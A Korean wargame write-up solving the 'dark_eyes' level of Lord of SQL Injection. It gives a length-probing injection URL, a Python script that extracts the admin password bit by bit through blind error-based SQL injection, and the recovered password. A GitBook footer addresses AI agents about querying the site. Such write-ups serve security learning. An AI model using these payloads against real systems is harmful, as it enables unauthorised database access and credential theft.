> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-dark_eyes.md).

# \[Lord Of Sqlinjection] dark\_eyes

<figure><img src="https://blog.kakaocdn.net/dna/qKdfT/btsNCd4Vq1P/AAAAAAAAAAAAAAAAAAAAAOpdii_jAJV5t06gJeJCq0yi7Itoe5csrvz621VdkXHj/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Zh9fR5M%2BTD5%2B8%2Bk08pG3kca2bxQ%3D" alt="" height="336" width="659"><figcaption></figcaption></figure>

* iron\_golem 문제의 해결방법 차용
  * select 1 union select 2 이용해서 풀면 됨
  * 이 구문으로 if 문을 막아놓았던 부분을 쿼리가 실행될 때 에러가 생기거나, 제대로 실행되는 것을 통해 파악 가능
  * 쿼리 정상 작동 → 원래 페이지 뜸
  * 쿼리 이상 작동 → 빈 페이지 뜸
  * 우선, length 함수를 이용해 패스워드의 길이를 알아본다.

```
[도메인 주소]?pw=' or id ='admin' and (select 1 union select 2 where !(length(pw)<10)) %23
```

<figure><img src="https://blog.kakaocdn.net/dna/bmr0iJ/btsNAUFmwBS/AAAAAAAAAAAAAAAAAAAAAN5-8IQq7Hw8mhb4JE3k_vW8O-4UK938CDIq7V8qs0qI/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=caoBN6yU0dHcsVFX%2Fxr8ydsH9FY%3D" alt="" height="454" width="948"><figcaption></figcaption></figure>

-> pw의 길이는 10보다 짧음을 파악 가능

(pw의 길이가 10보다 크다면 에러가 발생해서 exit()가 실행되어야 한다)

&#x20;

#### Password 구하기

```
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
headers = {'Cookie':'PHPSESSID=본인의 세션 아이디'}
URL = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?"
 
pw_length = 8
bit_length = 16
pw = ''
 
print("\n=== Find Password ===\n")
 
for i in range(1, pw_length+1):
    bit = ''
    
    for j in range(1, bit_length+1):
        payload = "pw=' or (select id where id='admin')=coalesce((select id where id='admin' and substr(lpad(bin(ord(substr(pw,{},1))),{},0),{},1)=1),(select 1 union select 2))%23".format(i, bit_length, j)
        res = requests.get(url=URL+payload, headers=headers, verify=False)
        
        if 'query' in res.text:
            # True -> bit == 1
            bit += '1'
        else:
            # 에러 발생 -> bit == 0
            bit += '0'
 
    pw += chr(int(bit, 2))
    print("pw (count %02d): %s (bit: %s, hex: %s)" % (i, chr(int(bit, 2)), bit, hex(int(bit, 2))))
 
print('\n>>> Final Password: %s' % pw)
```

-> vscode에 해당 프로그램을 돌려보면 pw는 5a2f5d3c이라는 것을 알 수 있다.

<figure><img src="https://blog.kakaocdn.net/dna/bhqZLl/btsNDluwjZN/AAAAAAAAAAAAAAAAAAAAAAA_d35hp_m8KPHkzt3epbYllO7ihwja5ZxA8hKrPJvU/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=W8UaMYhCL8JMuG5KITOvClFybtQ%3D" alt="" height="421" width="640"><figcaption></figcaption></figure>

```
[도메인 주소]?pw=5a2f5d3c
```

<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-dark_eyes.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.